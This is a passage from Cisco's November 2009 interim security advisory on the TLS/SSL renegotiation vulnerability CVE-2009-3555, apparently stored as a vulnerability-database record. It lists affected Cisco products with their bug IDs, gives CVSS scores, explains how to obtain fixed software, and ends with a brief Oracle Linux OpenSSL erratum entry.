AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN &quot;AS IS&quot; BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12600", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "[0.9.7a-9.2]\n- CVE-2009-3555 - support the secure renegotiation RFC (#533125) ", "edition": 4, "modified": "2010-03-25T00:00:00", "published": "2010-03-25T00:00:00", "id": "ELSA-2010-0164", "href": "http://linux.oracle.com/errata/ELSA-2010-0164.html", "title": "openssl097a security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}]}